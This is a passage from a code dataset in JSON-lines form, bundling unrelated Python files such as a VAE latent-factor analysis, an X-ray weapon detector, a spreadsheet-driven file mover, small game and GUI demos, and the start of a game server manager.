math.log(N)/math.log(2)\n\tkmixresult={}\n\tsent_id=1\n\n\tfor sentence in mysentences:\n\t\tpk=0\n\t\tmyline=tokenizeLine(sentence)\n\t\tfinal_tokens=stopWordRemove(myline)\n\n\t\tfor token in final_tokens:\n\t\t\tif token not in index:\n\t\t\t\tcontinue\n\t\t\tmylist=index[token]\n\t\t\tcf=0\t\t\n\t\t\tfor x,y in mylist:\n\t\t\t\tif x==1:\n\t\t\t\t\ttf=y\n\t\t\t\t\tdf=len(mylist)\n\t\t\t\t\t\n\t\t\t\tcf=cf+y\n\t\t\t#print 'token='+token\n\t\t\tt= cf*1.0/N\n\t\t\t#print 't='+str(t)\n\t\t\tidf = num*1.0/df if df else 0\n\t\t\t#print 'idf='+str(idf)\n\t\t\ts = (((cf-df)*1.0)/df) if df else 0\n\t\t\t#print 's='+str(s)\n\t\t\tr=1\n\t\t\tr = t/s if s else 0\n\t\t\t#print 'r='+str(r)\n\t\t\tpk = (r / (s+1) ) * (s / (s+1) ) + math.pow( (s / (s+1) ), tf)\n\n\t\t#print sentence\n\t\t#print pk\n\t\tkmixresult[sent_id] = pk\n\t\tsent_id = sent_id + 1\n\t\t# print(sentence, kmixresult[sent_id-1])\n\n\t# for sentence in mysentences:\n\t# \tprint(sentence)\n\n\t# print(len(mysentences))\n\t# print(kmixresult)\n\t\n\t# sorted_d = sorted(kmixresult.items(), key=operator.itemgetter(1),reverse=True)\n\treturn kmixresult\n\t# oFile = open('k_mix_output.txt', 'w')\n\t# for key,value in sorted_d:\n\t# \toFile.write(str(key)+'\\t'+str(value)+'\\n')\n\t# oFile.close()\n\n\nif __name__ == '__main__':\n\tif(len(sys.argv) < 2) :\n\t\tprint('Need to provide file to evaluate!')\n\t\texit(0)\n\t\n\tKMM(sys.argv[1])","sub_path":"supervised/k_mix_model_oneoff.py","file_name":"k_mix_model_oneoff.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"186196776","text":"#%%\nfrom __future__ import division\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\n\nfrom util import *\nfrom load_mnist import *\nfrom mnist_test_fnc import sweepLatentFactors\n\n# --- parameters ---\n# classes 0,3,4\ny_dim = 3\nz_dim = 6\nalpha_dim = 2\nc_dim = 1\nimg_size = 28\nclass_use = np.array([0,3,4])\ni0 = 1 # class 0 = t-shirt/top\ni3 = 3 # class 3 = dress\ni4 = 0 # class 4 = coat\nlatent_sweep_vals = np.linspace(-2,2,25)\nlatent_sweep_plot = [0,4,8,12,16,20,24]\nclassifier_file = 'pretrained_models/fmnist_034_classifier/model.pt'\nvae_file = 'pretrained_models/fmnist_034_vae_zdim6_alphadim2_lambda0.05/model.pt'\n\n# --- initialize ---\nclass_use_str = np.array2string(class_use) \ny_dim = class_use.shape[0]\nnewClass = range(0,y_dim)\nnsweep = len(latent_sweep_vals)\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nparams = {'z_dim' : z_dim,\n 'alpha_dim' : alpha_dim,\n 'No' : 100,\n 'Ni' : 25,\n 'decoder_net' : 'VAE_CNN',\n 'break_up_ce' : False}\n\n#%% --- load test data ---\nX, Y, tridx = load_fashion_mnist_classSelect('train',class_use,newClass)\nvaX, vaY, vaidx = load_fashion_mnist_classSelect('val',class_use,newClass)\nntrain = X.shape[0]\n\n#%% --- load VAE ---\nfrom models.CVAE import Decoder, Encoder\ncheckpoint_vae = torch.load(vae_file, map_location=device)\nencoder = Encoder(z_dim,c_dim,img_size**2).to(device)\ndecoder = Decoder(z_dim,c_dim,img_size**2).to(device)\nencoder.load_state_dict(checkpoint_vae['model_state_dict_encoder'])\ndecoder.load_state_dict(checkpoint_vae['model_state_dict_decoder'])\n\n#%% --- load classifier ---\nfrom models.CNN_classifier import CNN\ncheckpoint_model = torch.load(classifier_file, map_location=device)\nclassifier = CNN(y_dim).to(device)\nclassifier.load_state_dict(checkpoint_model['model_state_dict_classifier'])\n\n#%% --- encode example points to latent space ---\nx0_torch = torch.from_numpy(np.expand_dims(vaX[i0],0)).permute(0,3,1,2).float().to(device)\nx3_torch = torch.from_numpy(np.expand_dims(vaX[i3],0)).permute(0,3,1,2).float().to(device)\nx4_torch = torch.from_numpy(np.expand_dims(vaX[i4],0)).permute(0,3,1,2).float().to(device)\nlatent_x0 = encoder(x0_torch)[0].cpu().detach().numpy()\nlatent_x3 = encoder(x3_torch)[0].cpu().detach().numpy()\nlatent_x4 = encoder(x4_torch)[0].cpu().detach().numpy()\ndecoded_x0 = decoder(torch.unsqueeze(torch.from_numpy(latent_x0),0).float().to(device)).cpu().detach().numpy().squeeze()\ndecoded_x3 = decoder(torch.unsqueeze(torch.from_numpy(latent_x3),0).float().to(device)).cpu().detach().numpy().squeeze()\ndecoded_x4 = decoder(torch.unsqueeze(torch.from_numpy(latent_x4),0).float().to(device)).cpu().detach().numpy().squeeze()\nprint('Latent representation of sample 0 (validation set index %d): %s' % (i0, str(latent_x0)))\nprint('Latent representation of sample 3 (validation set index %d): %s' % (i3, str(latent_x3)))\nprint('Latent representation of sample 4 (validation set index %d): %s' % (i4, str(latent_x4)))\n\n#%% --- generate images from latent sweep ---\nlatent_sweep = np.zeros((z_dim, nsweep, img_size, img_size))\nfor ilatent in range(z_dim):\n for (isweep, v) in enumerate(latent_sweep_vals):\n latent_vec = np.zeros((z_dim))\n latent_vec[ilatent] = v\n latent_vec_torch = torch.unsqueeze(torch.from_numpy(latent_vec),0).float().to(device)\n latent_sweep[ilatent,isweep,:,:] = decoder(latent_vec_torch).cpu().detach().numpy()\n \n#%% --- plot latent sweep ---\nfig, axs = plt.subplots(z_dim, len(latent_sweep_plot))\nfor ilatent in range(z_dim):\n for (isweep, sweep_idx) in enumerate(latent_sweep_plot):\n img = 1.-latent_sweep[ilatent,sweep_idx,:,:].squeeze()\n axs[ilatent,isweep].imshow(img, cmap='gray', interpolation='nearest')\n axs[ilatent,isweep].set_xticks([])\n axs[ilatent,isweep].set_yticks([])\nprint('columns correspond to latent values %s' % str(latent_sweep_vals[latent_sweep_plot]))\nplt.savefig('./figs/fig_fmnist_quant_latentsweep.svg', bbox_inches=0)\n\n\n#%% --- compute information flow ---\nfrom informationFlow import information_flow_singledim\ninfo_flow = np.zeros((z_dim))\nfor i in range(z_dim):\n print('Computing information flow for latent dimension %d/%d...' % (i+1,z_dim))\n info_flow[i] = information_flow_singledim(i, params, decoder, classifier, device)\n\n# --- plot information flow ---\ncols = {'golden_poppy' : [1.000,0.761,0.039],\n 'bright_navy_blue' : [0.047,0.482,0.863],\n 'rosso_corsa' : [0.816,0.000,0.000]}\nx_labels = ('$\\\\alpha_1$', '$\\\\alpha_2$', '$\\\\beta_1$', '$\\\\beta_2$', '$\\\\beta_3$', '$\\\\beta_4$')\nfig, ax = plt.subplots()\nax.bar(range(z_dim), info_flow, color=[\n cols['rosso_corsa'], cols['rosso_corsa'], cols['bright_navy_blue'],\n cols['bright_navy_blue'], cols['bright_navy_blue'], cols['bright_navy_blue']])\nplt.xticks(range(z_dim), x_labels)\nax.yaxis.grid(linewidth='0.3')\nplt.ylabel('Information flow to $\\\\widehat{Y}$')\nplt.title('Information flow of individual causal factors')\nplt.savefig('./figs/fig_fmnist_quant_if.svg')\nplt.savefig('./figs/fig_fmnist_quant_if.pdf')\n\n#%% --- compute classifier accuracy ---\nclassifier_accuracy_original = np.zeros(z_dim)\nYhat = np.zeros((len(vaX)))\nYhat_reencoded = np.zeros((len(vaX)))\nYhat_aspectremoved = np.zeros((z_dim, len(vaX)))\n\nfor i_samp in range(len(vaX)):\n x = torch.from_numpy(vaX[i_samp:i_samp+1,:,:,:]).permute(0,3,1,2).float().to(device)\n Yhat[i_samp] = np.argmax(classifier(x)[0].cpu().detach().numpy())\n z = encoder(x)[0]\n xhat = decoder(z)\n Yhat_reencoded[i_samp] = np.argmax(classifier(xhat)[0].cpu().detach().numpy())\n for i_latent in range(z_dim): \n z = encoder(x)[0]\n z[0,i_latent] = torch.randn((1))\n xhat = decoder(z)\n Yhat_aspectremoved[i_latent,i_samp] = np.argmax(classifier(xhat)[0].cpu().detach().numpy())\n\nclassifier_accuracy = np.mean(vaY == Yhat)\nclassifier_accuracy_reencoded = np.mean(vaY == Yhat_reencoded)\nclassifier_accuracy_aspectremoved = np.zeros((z_dim))\nfor i in range(z_dim):\n classifier_accuracy_aspectremoved[i] = np.mean(vaY == Yhat_aspectremoved[i,:])\n\n# --- plot classifier accuracy ---\ncols = {'black' : [0.000, 0.000, 0.000],\n 'golden_poppy' : [1.000,0.761,0.039],\n 'bright_navy_blue' : [0.047,0.482,0.863],\n 'rosso_corsa' : [0.816,0.000,0.000]}\nx_labels = ('orig','reenc','$\\\\alpha_1$', '$\\\\alpha_2$', '$\\\\beta_1$', '$\\\\beta_2$',\n '$\\\\beta_3$', '$\\\\beta_4$')\nfig, ax = plt.subplots()\nax.yaxis.grid(linewidth='0.3')\nax.bar(range(z_dim+2), np.concatenate(([classifier_accuracy],\n [classifier_accuracy_reencoded],\n classifier_accuracy_aspectremoved)),\n color=[cols['black'], cols['black'], cols['rosso_corsa'],\n cols['rosso_corsa'], cols['bright_navy_blue'],\n cols['bright_navy_blue'], cols['bright_navy_blue'],\n cols['bright_navy_blue']])\nplt.xticks(range(z_dim+2), x_labels)\nplt.ylim((0.2,1.0))\nplt.yticks((0.2,0.4,0.6,0.8,1.0))#,('0.5','','0.75','','1.0'))\nplt.ylabel('Classifier accuracy')\nplt.title('Classifier accuracy after removing aspect')\nplt.savefig('./figs/fig_fmnist_quant_accuracy.svg')\nplt.savefig('./figs/fig_fmnist_quant_accuracy.pdf')","sub_path":"make_fmnist_quant.py","file_name":"make_fmnist_quant.py","file_ext":"py","file_size_in_byte":7259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"170326209","text":"try:\n import setuptools\nexcept:\n print('you should have setuptools installed (http://pypi.python.org/pypi/setuptools), for some Linux distribs you can get it via [sudo] apt-get install python-setuptools')\n print('press Enter for exit...')\n input()\n exit()\n\nimport os, sys\n(filepath, filename) = os.path.split(__file__)\n\nfor moduleName in ['DerApproximator', 'FuncDesigner', 'OpenOpt', 'SpaceFuncs']:\n print(moduleName + ' installation:')\n os.chdir(((filepath + os.sep) if filepath != '' else '') + moduleName)\n os.system('\\\"%s\\\" setup.py install' % sys.executable)\n #os.system('%s setup.py install' % sys.executable)\n os.chdir('..')\n\n","sub_path":"install_all.py","file_name":"install_all.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"274196509","text":"import os\nfrom typing import Tuple\n\nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport torch\nfrom torchvision.models.detection import fasterrcnn_resnet50_fpn\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torchvision.ops import nms\nimport albumentations as A\nfrom albumentations.pytorch.transforms import ToTensorV2\n\nfrom svlib.svtools import svtools as svt\n\nlog = svt.log\n\n\nclass ThreatPredictor:\n\n def __init__(\n self,\n path_model: str,\n model_name: str,\n kafka_input_topic: str,\n kafka_output_topic: str\n ) -> None:\n self.path_model = path_model\n self.model_name = model_name\n self.kafka_input_topic = kafka_input_topic\n self.kafka_output_topic = kafka_output_topic\n self.kafka_helper = svt.kafka\n self.device = torch.device('cpu')\n self.model = self.load_model()\n self.classes = {\n 0: 'backGround',\n 1: 'Knife',\n 2: 'Gun',\n 3: 'Wrench',\n 4: 'Pliers',\n 5: 'Scissors'\n }\n self.tp_schema_helper = svt.schema.create_helper('ThreatPrediction')\n\n def load_model(self):\n \"\"\"\"\"\"\n model = fasterrcnn_resnet50_fpn(pretrained=False,\n pretrained_backbone=False)\n # ['Knife', 'Gun', 'Wrench', 'Pliers', 'Scissors'] + background\n num_classes = 6\n # get number of input features for the classifier\n in_features = model.roi_heads.box_predictor.cls_score.in_features\n # replace the pre-trained head with a new one\n model.roi_heads.box_predictor = FastRCNNPredictor(in_features,\n num_classes)\n # Load the trained weights\n path_model = os.path.join(os.getcwd(), self.path_model,\n self.model_name)\n model.load_state_dict(torch.load(\n path_model, map_location=self.device\n ))\n model.eval()\n model.to(self.device)\n\n return model\n\n def predict_image(self, path_image: str) -> Tuple:\n \"\"\"\n\n :param path_image:\n :return:\n \"\"\"\n log.info(f\"Received a scanned X-ray image at path: {path_image}\")\n\n image = Image.open(path_image)\n image = np.array(image).astype(np.float32)\n image /= 255.0\n sample = A.Compose([ToTensorV2(p=1.0)])(**{'image': image})\n image = sample['image']\n image.to(self.device)\n # add a batch a dimension\n image = image.unsqueeze(0)\n\n output = self.model(image)\n\n # CODE FOR THE NMS COMMENT OUT IF NOT NEEDED\n new_output = []\n\n for idx, output_ in enumerate(output):\n preds = output[idx]['boxes']\n scores = output[idx]['scores']\n keep = nms(preds, scores, 0.5)\n new_dict = {'boxes': output[idx]['boxes'][keep],\n 'scores': output[idx]['scores'][keep],\n 'labels': output[idx]['labels'][keep],\n }\n new_output.append(new_dict)\n output = new_output\n # CODE FOR THE NMS\n\n # get all predicted class names\n pred_classes = np.array([\n self.classes[i] for i in output[0]['labels'].cpu().numpy()\n ])\n detection_threshold = 0.5\n # get scores and bounding boxes for all predicted objects\n boxes = output[0]['boxes'].data.cpu().numpy()\n scores = output[0]['scores'].data.cpu().numpy()\n # x, y, w, h\n boxes[:, 2] = boxes[:, 2] - boxes[:, 0]\n boxes[:, 3] = boxes[:, 3] - boxes[:, 1]\n\n pred_classes = pred_classes[scores >= detection_threshold].tolist()\n boxes = boxes[scores >= detection_threshold].astype(np.int32).tolist()\n scores = scores[scores >= detection_threshold].tolist()\n\n return pred_classes, boxes, scores\n\n def draw_bounding_boxes(\n self,\n path_image: str,\n boxes: list,\n output_image_path: str\n ) -> None:\n \"\"\"\n\n :param path_image:\n :param boxes:\n :param output_image_path:\n :return:\n \"\"\"\n image = cv2.imread(path_image)\n # convert back to numpy\n boxes = np.array(boxes)\n # x1, y1, x2, y2\n boxes[:, 2] = boxes[:, 2] + boxes[:, 0]\n boxes[:, 3] = boxes[:, 3] + boxes[:, 1]\n\n for box in boxes:\n cv2.rectangle(image, (box[0], box[1]), (box[2], box[3]),\n (0, 0, 255), 3)\n\n cv2.imwrite(output_image_path, image)\n\n def get_threat_prediction_schema(\n self,\n message: dict,\n predictions: dict\n ) -> dict:\n \"\"\"\n\n :param message:\n :param predictions:\n :return:\n \"\"\"\n threat_prediction = {\n \"version\": \"1.0.0\",\n \"producerID\": message[\"producerID\"],\n \"modelName\": self.model_name.split(\".pth\")[0],\n \"imageID\": message[\"imageID\"],\n \"imagePath\": message[\"imagePath\"],\n \"predictionTS\": svt.chrono.now_as_str(),\n }\n threat_prediction.update(predictions)\n\n return threat_prediction\n\n def detect_threat(self, message: dict) -> None:\n \"\"\"\n\n :param message:\n :return:\n \"\"\"\n path_image = os.path.join(message['imagePath'], message['imageID'])\n\n pred_classes, boxes, scores = self.predict_image(path_image)\n\n # log.info(f\"Detected classes: {pred_classes}\\n\")\n # log.info(f\"Predicted scores: {scores}\\n\")\n # log.info(f\"Predicted bounding boxes: {boxes}\\n\")\n # No drawing of bounding boxes on the image if there is no threat\n if pred_classes:\n parts = message[\"imageID\"].split('.')\n oip = os.path.join(\"predictions\", parts[0] + '_bbox.' + parts[1])\n self.draw_bounding_boxes(path_image, boxes, oip)\n else:\n oip = \"\"\n\n predictions = {\n \"prediction\": True if pred_classes else False,\n \"numberOfThreats\": len(pred_classes),\n \"outputImagePath\": oip,\n \"predictedObjects\": pred_classes,\n \"boundingBoxes\": boxes,\n \"confidenceScores\": scores\n }\n threat_prediction = self.get_threat_prediction_schema(message,\n predictions)\n log.info(threat_prediction)\n self.tp_schema_helper.validate(threat_prediction)\n self.kafka_helper.publish(self.kafka_output_topic, threat_prediction)\n\n def get_scanned_images(self) -> None:\n \"\"\"\"\"\"\n self.kafka_helper.consume_forever(\n group_id='threat_predictor',\n topics=[self.kafka_input_topic],\n callback_functions=[self.detect_threat]\n )\n\n\nif __name__ == '__main__':\n cr = svt.conf\n app_conf = cr.parse_yaml(\n os.path.join(os.getcwd(), 'configs', 'app_config.yaml')\n )['threat_predictor']\n\n tp = ThreatPredictor(**app_conf)\n\n tp.get_scanned_images()\n","sub_path":"source/components/threat_predictor/threat_predictor.py","file_name":"threat_predictor.py","file_ext":"py","file_size_in_byte":7122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"155612317","text":"from tkinter import *\nfrom tkinter import ttk\n\nclass App:\n def __init__(self, master):\n self.master = master\n self.initWidgets()\n \n def initWidgets(self):\n bm = PhotoImage(file = 'images/test.png')\n self.label = ttk.Label(self.master, \n text='This is for testing!', \n image=bm, \n font=('StSong', 20, 'bold'), \n foreground='red')\n self.label.bm = bm\n self.label['compound'] = None\n self.label.pack()\n\n f = ttk.Frame(self.master)\n f.pack(fill=BOTH, expand=YES)\n compounds = ('None', 'LEFT', 'RIGHT', 'TOP', 'BOTTOM', 'CENTER')\n #定义一个StringVar变量,用作绑定Radiobutton的变量\n self.var = StringVar()\n self.var.set('None')\n for val in compounds:\n rb = Radiobutton(f, \n text=val, \n padx=20, \n variable=self.var, \n command=self.change_compound, \n value=val).pack(side=LEFT, anchor=CENTER)\n \n def change_compound(self):\n self.label['compound'] = self.var.get().lower()\n\nroot = Tk()\nroot.title('Compound测试')\nApp(root)\nroot.mainloop()","sub_path":"C11_GUI/11.5_compound_test.py","file_name":"11.5_compound_test.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"53579098","text":"from nannon.logic import *\nfrom functools import reduce\n\n################################################################################\n\n ###########\n # PLAYERS #\n ###########\n\n# Returns the result of making a random move.\ndef rand_play(pos, roll):\n move = random.choice(legal_moves(pos, roll))\n return make_move(pos, move, roll)\n\n# Prints board, shows legal moves, and queries the user for input.\ndef human(pos, roll):\n lm = legal_moves(pos, roll)\n print_board(pos)\n print('You rolled:', roll)\n print('Legal moves:', lm)\n move = int(input('Your move? '))\n if move not in lm:\n print('Try again.')\n human(pos, roll)\n return make_move(pos, move, roll)\n\n# Returns the position resulting from moving the furthest forward piece.\n# We can do this because the tuple will always be sorted.\ndef first_play(pos, roll):\n move = legal_moves(pos, roll)[-1]\n return make_move(pos, move, roll)\n\n# Returns the position resulting from moving the furthest back piece.\ndef last_play(pos, roll):\n move = legal_moves(pos, roll)[0]\n return make_move(pos, move, roll)\n\n# For each legal move, sums the scores for each player.\n# Appends the move along with the score to a list.\n# Returns the result of making the move with the highest score value.\ndef score_play(pos, roll):\n candidates = []\n for move in legal_moves(pos, roll):\n me, you = make_move(pos, move, roll)\n me_score = reduce(lambda x, y: x + y, me)\n you_score = reduce(lambda x, y: x + y, you)\n candidates.append((move, me_score - you_score))\n best_move, _ = max(candidates, key=lambda x: x[1])\n return make_move(pos, best_move, roll)\n\n# You may choose to implement new players below\n","sub_path":"nannon/.ipynb_checkpoints/players-checkpoint.py","file_name":"players-checkpoint.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"213027234","text":"s = input()\n\ns = s.upper()\n\ns = sorted(s)\n\ncount = {}\n\nfor i in s:\n try: count[i] += 1\n except: count[i]=1\n\nresult = [k for k, v in count.items() if max(count.values()) == v]\n\nif len(result) == 1:\n print(*result)\nelse:\n print('?')","sub_path":"5주차/심재민/[3주차] 하나하나.py","file_name":"[3주차] 하나하나.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"407223947","text":"\n__author__ = \"Nitin U.\"\n\n\"\"\" file_mover.py: The purpose of this program is to read an excel spreadsheet\nthen from that spreadsheet it will move the files from a source folder to a \ndestination folder. The source and the destination folder will be in 2 different\ncolumns. It will also check if the destination folder exists or not. if does \nnot exist then it will create that folder \"\"\"\n\n\"\"\" \nSteps\n1. Read the excel file and then access the sheet\n2. Create 2 lists 1 for source and 1 for destination\n3. Loop through the column and create the folders if they don't exist\n4. Move the files from the source location to target using shutil library \n\n\"\"\"\n\nimport os\nimport shutil\nimport glob\nimport xlrd\n\n \n# Parent Directory path \nparent_dir = r\"C:\\\\Users\\\\nitin\\\\Dropbox (Personal)\\\\Swinburne Statistics\\\\STA70005-Survey Sampling\\\\2020\\\\files\\\\pdf - Copy\\\\\"\n\n# Directory to be created under the parent directory\n\ndef create_directory(par_dir, dir):\n path = os.path.join(par_dir, dir) \n os.mkdir(path) \n \n\ndef check_if_exists(par_dir, dir):\n\n \"\"\" This function will check whether the specified path is an existing directory or not this will return a list \"\"\"\n \n path = os.path.join(par_dir, dir)\n \n isdir = os.path.isdir(path) \n \n return isdir\n \ndef get_file_names(folder_name):\n \n \"\"\" This will get the full path of all the files in the folder \"\"\"\n \n file_path_list = glob.glob(folder_name)\n \n return file_path_list \n\n\ndef main():\n \n file_to_read_from = r\"C:\\Users\\nitin\\Dropbox (Personal)\\Swinburne Statistics\\STA70005-Survey Sampling\\2020\\Output.xlsx\"\n \n book = xlrd.open_workbook(file_to_read_from)\n \n sheet = book.sheet_by_name(\"Sheet1\")\n \n for i in range(1, len(sheet.col(0))):\n\n src_file = sheet.row(i)[0].value # column 0: this column contains all the original path of the files.\n dest_folder = sheet.row(i)[7].value # column 7: this column contains the full path of the destination folder NOT THE FILES, only Folders\n folder = sheet.row(i)[6].value # column 6: this column contains the name of the destination folder\n\n try:\n if check_if_exists(parent_dir, folder) == True:\n\n print(\"Directory '% s' already exists under the parent directory chutiye\" % folder)\n\n else:\n\n create_directory(parent_dir, folder)\n print(\"===========================\") \n print(\"Directory '% s' created under the parent directory\" % folder) \n print(\"===========================\") \n\n shutil.move(r\"\"+src_file, r\"\"+str(dest_folder))\n\n print(\"file % s moved\" % src_file)\n\n except Exception as why:\n \n print(why)\n\n \nif __name__ == \"__main__\":\n main()\n ","sub_path":"file_mover.py","file_name":"file_mover.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"310224840","text":"import numpy as np\n\nn =100 \ncluster1x = np.random.uniform(5, 10, n)\ncluster1y = np.random.uniform(5, 10, n)\ncluster1z = np.random.uniform(5, 10, n)\nlabel1 = np.full((n,),1)\ncluster1 = np.column_stack((cluster1x, cluster1y, cluster1z, label1))\n\ncluster2x = np.random.uniform(-10, -5, n)\ncluster2y = np.random.uniform(-10, -5, n)\ncluster2z = np.random.uniform(-10, -5, n)\nlabel2 = np.full((n,),2)\ncluster2 = np.column_stack((cluster2x, cluster2y, cluster2z, label2))\n\ncluster3x = np.random.uniform(-20, -15, n)\ncluster3y = np.random.uniform(7, 10, n)\ncluster3z = np.random.uniform(7, 10, n)\nlabel3 = np.full((n,),3)\ncluster3 = np.column_stack((cluster3x, cluster3y, cluster3z, label3))\n\ndata = np.row_stack((cluster1, cluster2, cluster3))\nnp.random.shuffle(data)\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection = '3d')\nax.scatter(cluster1x, cluster1y, cluster1z,c='blue')\nax.scatter(cluster2x, cluster2y, cluster2z,c='red')\nax.scatter(cluster3x, cluster3y, cluster3z,c='green')\nplt.show()\n\nfrom sklearn.linear_model import LogisticRegression as MaxEnt\nfrom sklearn.cross_validation import train_test_split\nX,y = np.hsplit(data,[3])\nX_train, X_test, y_train, y_test = train_test_split(X, y)\n#print(data)\n#print(X_train)\n#print(X_test)\n#print(y_train)\n#print(y_test)\nclassifier = MaxEnt()\nclassifier.fit(X_train, y_train)\npreds = classifier.predict(X_test)\nif n < 5:\n print(preds)\n print(y_test)\nfrom sklearn.metrics import accuracy_score\nprint(accuracy_score(preds, y_test))\n","sub_path":"maxent_example.py","file_name":"maxent_example.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"254940015","text":"#!/usr/bin/env python3.8\n# Released under the MIT License. See LICENSE for details.\n#\n\"\"\"BallisticaCore server manager.\"\"\"\nfrom __future__ import annotations\n\nimport json\nimport os\nimport signal\nimport subprocess\nimport sys\nimport time\nfrom pathlib import Path\nfrom threading import Lock, Thread, current_thread\nfrom typing import TYPE_CHECKING\n\n# We make use of the bacommon and efro packages as well as site-packages\n# included with our bundled Ballistica dist, so we need to add those paths\n# before we import them.\nsys.path += [\n str(Path(Path(__file__).parent, 'dist', 'ba_data', 'python')),\n str(Path(Path(__file__).parent, 'dist', 'ba_data', 'python-site-packages'))\n]\n\nfrom bacommon.servermanager import ServerConfig, StartServerModeCommand\nfrom efro.dataclasses import dataclass_from_dict, dataclass_validate\nfrom efro.error import CleanError\nfrom efro.terminal import Clr\n\nif TYPE_CHECKING:\n from typing import Optional, List, Dict, Union, Tuple\n from types import FrameType\n from bacommon.servermanager import ServerCommand\n\nVERSION_STR = '1.1.1'\n\n# Version history:\n# 1.1.1:\n# Switched config reading to use efro.dataclasses.dataclass_from_dict()\n# 1.1.0:\n# Added shutdown command\n# Changed restart to default to immediate=True\n# Added clean_exit_minutes, unclean_exit_minutes, and idle_exit_minutes\n# 1.0.0:\n# Initial release\n\n# How many seconds we wait after asking our subprocess to do an immediate\n# shutdown before bringing down the hammer.\nIMMEDIATE_SHUTDOWN_TIME_LIMIT = 5.0\n\n\nclass ServerManagerApp:\n \"\"\"An app which manages BallisticaCore server execution.\n\n Handles configuring, launching, re-launching, and otherwise\n managing BallisticaCore operating in server mode.\n \"\"\"\n\n def __init__(self) -> None:\n try:\n self._config = self._load_config()\n except Exception as exc:\n raise CleanError(f'Error loading config: {exc}') from exc\n self._wrapper_shutdown_desired = False\n self._done = False\n self._subprocess_commands: List[Union[str, ServerCommand]] = []\n self._subprocess_commands_lock = Lock()\n self._subprocess_force_kill_time: Optional[float] = None\n self._restart_minutes: Optional[float] = None\n self._running_interactive = False\n self._subprocess: Optional[subprocess.Popen[bytes]] = None\n self._launch_time = time.time()\n self._subprocess_launch_time: Optional[float] = None\n self._subprocess_sent_auto_restart = False\n self._subprocess_sent_clean_exit = False\n self._subprocess_sent_unclean_exit = False\n self._subprocess_thread: Optional[Thread] = None\n\n # If we don't have any explicit exit conditions set,\n # we run indefinitely (though we restart our subprocess\n # periodically to clear out leaks/cruft)\n if (self._config.clean_exit_minutes is None\n and self._config.unclean_exit_minutes is None\n and self._config.idle_exit_minutes is None):\n self._restart_minutes = 360.0\n\n @property\n def config(self) -> ServerConfig:\n \"\"\"The current config for the app.\"\"\"\n return self._config\n\n @config.setter\n def config(self, value: ServerConfig) -> None:\n dataclass_validate(value)\n self._config = value\n\n @property\n def restart_minutes(self) -> Optional[float]:\n \"\"\"The time between automatic server restarts.\n\n Restarting the server periodically can minimize the effect of\n memory leaks or other built-up cruft.\n \"\"\"\n return self._restart_minutes\n\n def run_interactive(self) -> None:\n \"\"\"Run the app loop to completion.\"\"\"\n import code\n\n if self._running_interactive:\n raise RuntimeError('Already running interactively.')\n self._running_interactive = True\n\n # Print basic usage info in interactive mode.\n if sys.stdin.isatty():\n if __debug__:\n modestr = '(debug mode)'\n else:\n modestr = '(opt mode)'\n print(f'{Clr.CYN}{Clr.BLD}BallisticaCore server'\n f' manager {VERSION_STR}'\n f' starting up {modestr}...{Clr.RST}\\n'\n f'{Clr.CYN}Use the \"mgr\" object to make'\n f' live server adjustments.\\n'\n f'Type \"help(mgr)\" for more information.{Clr.RST}')\n\n # Python will handle SIGINT for us (as KeyboardInterrupt) but we\n # need to register a SIGTERM handler so we have a chance to clean\n # up our subprocess when someone tells us to die. (and avoid\n # zombie processes)\n signal.signal(signal.SIGTERM, self._handle_term_signal)\n\n # Fire off a background thread to wrangle our server binaries.\n self._subprocess_thread = Thread(target=self._bg_thread_main)\n self._subprocess_thread.start()\n\n context = {'__name__': '__console__', '__doc__': None, 'mgr': self}\n\n # Enable tab-completion if possible.\n self._enable_tab_completion(context)\n\n # Now just sit in an interpreter.\n # TODO: make it possible to use IPython if the user has it available.\n try:\n code.interact(local=context, banner='', exitmsg='')\n except SystemExit:\n # We get this from the builtin quit(), etc.\n # Need to catch this so we can clean up, otherwise we'll be\n # left in limbo with our process thread still running.\n pass\n except BaseException as exc:\n print(f'{Clr.SRED}Unexpected interpreter exception:'\n f' {exc} ({type(exc)}){Clr.RST}')\n\n print(f'{Clr.CYN}Server manager shutting down...{Clr.RST}')\n\n if self._subprocess_thread.is_alive():\n print(f'{Clr.CYN}Waiting for subprocess exit...{Clr.RST}')\n\n # Mark ourselves as shutting down and wait for the process to wrap up.\n self._done = True\n self._subprocess_thread.join()\n\n def cmd(self, statement: str) -> None:\n \"\"\"Exec a Python command on the current running server subprocess.\n\n Note that commands are executed asynchronously and no status or\n return value is accessible from this manager app.\n \"\"\"\n if not isinstance(statement, str):\n raise TypeError(f'Expected a string arg; got {type(statement)}')\n with self._subprocess_commands_lock:\n self._subprocess_commands.append(statement)\n self._block_for_command_completion()\n\n def _block_for_command_completion(self) -> None:\n # Ideally we'd block here until the command was run so our prompt would\n # print after it's results. We currently don't get any response from\n # the app so the best we can do is block until our bg thread has sent\n # it. In the future we can perhaps add a proper 'command port'\n # interface for proper blocking two way communication.\n while True:\n with self._subprocess_commands_lock:\n if not self._subprocess_commands:\n break\n time.sleep(0.1)\n\n # One last short delay so if we come out *just* as the command is sent\n # we'll hopefully still give it enough time to process/print.\n 